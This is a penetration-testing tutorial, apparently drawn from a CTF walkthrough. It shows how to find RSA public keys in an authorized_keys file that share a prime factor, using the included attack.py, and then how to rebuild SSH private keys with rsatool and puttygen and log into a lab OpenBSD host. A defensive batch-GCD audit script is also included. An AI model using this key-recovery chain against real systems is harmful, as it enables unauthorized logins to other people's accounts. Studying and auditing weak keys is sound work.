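During a penetration test you sometimes obtain an authorized_keys file through an unauthorized-access vulnerability. It contains the public keys that a large number of accounts use for passwordless login. How do you take the next step from there?
One option is an RSA "collision" approach: find two public keys that share the factor p, and from there recover the private keys step by step. (I don't really understand the underlying theory; I'm told it comes from this paper: https://factorable.net/weakkeys12.extended.pdf.) The method in this post was learned from https://hackso.me/rsa-1-walkthrough/. I rewrote the scripts from that write-up by hand so that everything runs in Python; the script is compatible with both python2 and python3.
*Note: this requires basic RSA knowledge. At the very least you need to know what the two factors p and q of the RSA algorithm are.
*Note: the success rate of this method is relatively low. Given the combined effect of current computer performance, computing power and algorithms, the chance of finding a shared factor p is extremely low, so success has a precondition: the authorized_keys file must contain a large number of public keys.
1. Obtain the authorized_keys file and run the script below. (The test authorized_keys file and the attack.py script are attached at the end of this post.)
The script works out which two public keys share a p and prints the q that corresponds to each of them.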
root@kali:~/Desktop/Pentration# python3 attack.py
[('2', '4', 154417972435807005071073724522212444390586453823829143415803831059147415798074017502040314003763421243774270757922304211573942665136361376688205405360960917939484579087307177536921412011411703961828583167653172004502917347120641950199480561070177933253465927358617195370782866425595898798109004224439814798057, 154138482778403634422324585381094741396112094157924874391263694520821571222861298674105765179306306537493034017749692130071107610613435921888902004138078680460276016821583678249932808105907339203963186655685583329163374562641235896970977501756291570424272228689701476926803652905250957577229144433204452772127, 153278113332014430314822533712203891727299288836706793970670250689211994721080531031391472583116454287125291108401187935648312751844041461411234500935073837231805656247842743814066543045935616374230913460500896653516311833291062554618374636514900539486293512925569339760306744210644153977272176465759656466897)]
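As the output shows, the second and fourth public keys share a p.
2. Compute the RSA private keys that correspond to the two public keys
Step 1 has already converted the SSH public keys into RSA public keys. From the p and q values obtained there, the RSA private key for each of the two public keys can now be computed; this requires rsatool.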
root@kali:~/Desktop/Pentration/rsatool# ./rsatool.py -o user2.pem -p 154417972435807005071073724522212444390586453823829143415803831059147415798074017502040314003763421243774270757922304211573942665136361376688205405360960917939484579087307177536921412011411703961828583167653172004502917347120641950199480561070177933253465927358617195370782866425595898798109004224439814798057 -q 154138482778403634422324585381094741396112094157924874391263694520821571222861298674105765179306306537493034017749692130071107610613435921888902004138078680460276016821583678249932808105907339203963186655685583329163374562641235896970977501756291570424272228689701476926803652905250957577229144433204452772127
root@kali:~/Desktop/Pentration/rsatool# ./rsatool.py -o user4.pem -p 154417972435807005071073724522212444390586453823829143415803831059147415798074017502040314003763421243774270757922304211573942665136361376688205405360960917939484579087307177536921412011411703961828583167653172004502917347120641950199480561070177933253465927358617195370782866425595898798109004224439814798057 -q 153278113332014430314822533712203891727299288836706793970670250689211994721080531031391472583116454287125291108401187935648312751844041461411234500935073837231805656247842743814066543045935616374230913460500896653516311833291062554618374636514900539486293512925569339760306744210644153977272176465759656466897
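3. Generate the SSH private keys that correspond to the two public keys
Step 2 produced the RSA private keys for the two public keys. Next, the SSH private keys used for passwordless login can be generated from them.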
root@kali:~/Desktop/Pentration/rsatool# puttygen user2.pem -o user2 -O private-openssh-new
root@kali:~/Desktop/Pentration/rsatool# puttygen user4.pem -o user4 -O private-openssh-new
The generated user2 and user4 files are the SSH private keys we need.
4. Log in to the host without a password
root@kali:~/Desktop/Pentration/rsatool# ssh -i user2 user2@192.168.109.248
Last login: Sat Jan 5 01:46:12 2019 from 192.168.109.131
OpenBSD 6.3 (GENERIC) #100: Sat Mar 24 14:17:45 MDT 2018
Welcome to OpenBSD: The proactively secure Unix-like operating system.
Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code. With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.
rsafun$
The login succeeded.
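The shared-prime check from step 1, written as a defender-side audit of an authorized_keys file (an added example, not part of the original post or of attack.py). It reads the modulus straight out of each ssh-rsa blob instead of calling ssh-keygen/openssl, and goes beyond the script's pairwise loop by using the batch-GCD product/remainder-tree method from the factorable.net paper; all function names and the toy moduli are constructed for illustration.

```python
import base64
import struct
from math import gcd

def rsa_modulus(line):
    """Return (comment, n) for an 'ssh-rsa <base64> [comment]' line, else None."""
    parts = line.split()
    if "ssh-rsa" not in parts[:-1]:
        return None
    i = parts.index("ssh-rsa")
    blob, fields = base64.b64decode(parts[i + 1]), []
    while len(blob) >= 4:                      # length-prefixed fields: type, e, n
        (size,) = struct.unpack(">I", blob[:4])
        fields.append(blob[4:4 + size])
        blob = blob[4 + size:]
    if len(fields) != 3 or fields[0] != b"ssh-rsa":
        return None
    return " ".join(parts[i + 2:]) or "?", int.from_bytes(fields[2], "big")

def batch_gcd(moduli):
    """For every n_i return gcd(n_i, product of all the other moduli)."""
    tree = [list(moduli)]                      # product tree, leaves first
    while len(tree[-1]) > 1:
        lvl = tree[-1]
        tree.append([lvl[k] * lvl[k + 1] if k + 1 < len(lvl) else lvl[k]
                     for k in range(0, len(lvl), 2)])
    rems = tree.pop()                          # [P], the product of all moduli
    while tree:                                # remainder tree: P mod n^2 per node
        rems = [rems[k // 2] % (n * n) for k, n in enumerate(tree.pop())]
    return [gcd(r // n, n) for r, n in zip(rems, moduli)]

def audit(lines):
    """Map key comment -> finding for every RSA key that should be rotated."""
    keys = [k for k in map(rsa_modulus, lines) if k]
    # g == n: identical modulus, or both primes also occur in other keys
    return {name: "duplicate-or-fully-shared" if g == n else "shares-prime"
            for (name, n), g in zip(keys, batch_gcd([n for _, n in keys])) if g != 1}

def make_line(n, comment, e=65537):
    """Constructed test helper: encode a toy modulus as an ssh-rsa line."""
    def mp(x):
        raw = x.to_bytes(x.bit_length() // 8 + 1, "big")  # leading zero byte keeps it positive
        return struct.pack(">I", len(raw)) + raw
    blob = struct.pack(">I", 7) + b"ssh-rsa" + mp(e) + mp(n)
    return "ssh-rsa %s %s" % (base64.b64encode(blob).decode(), comment)

# Constructed toy keys (tiny primes): alice/carol share 1000003, erin repeats bob's modulus.
SAMPLE = [make_line(1000003 * 1000033, "alice"), make_line(1000037 * 1000039, "bob"),
          make_line(1000003 * 1000081, "carol"), make_line(1000037 * 1000039, "erin"),
          make_line(1000099 * 1000117, "dave")]
```

Passing the lines of a real file (`audit(open(path))`) reports the keys whose modulus shares a factor with another entry; those keys should be regenerated and their old entries removed.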
*Attachments
(1) attack.py
#attack.py
from itertools import combinations
try:
    from math import gcd        # Python 3.5+ (fractions.gcd was removed in 3.9)
except ImportError:
    from fractions import gcd   # Python 2
import subprocess
import os

# Write each public key from authorized_keys to its own file: user1, user2, ...
with open("authorized_keys") as f:
    pub_keys = [line for line in f if line.strip()]
key_files = []
for idx, key in enumerate(pub_keys, 1):
    name = "user" + str(idx)
    with open(name, 'w') as out:
        out.write(key)
    key_files.append(name)

# Convert each SSH public key to an RSA public key and read its modulus n (hex)
moduli = {}
for idx, name in enumerate(key_files, 1):
    cmd = "ssh-keygen -e -m PEM -f " + name + " | openssl rsa -RSAPublicKey_in -modulus -noout"
    rdata = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT).stdout.readlines()
    for j in rdata:
        j = bytes.decode(j)
        if j.startswith("Modulus="):
            moduli[str(idx)] = int(j.split('=')[1], 16)

# gcd of every pair of moduli; a result other than 1 is a shared prime p
result = []
for (i, j) in combinations(sorted(moduli, key=int), 2):
    p = gcd(moduli[i], moduli[j])
    if p != 1:
        # (key i, key j, shared p, q of key i, q of key j)
        result.append((i, j, p, moduli[i] // p, moduli[j] // p))
        break
print(result)

# Remove only the temporary files this script created
for name in key_files:
    os.remove(name)
(2) authorized_keys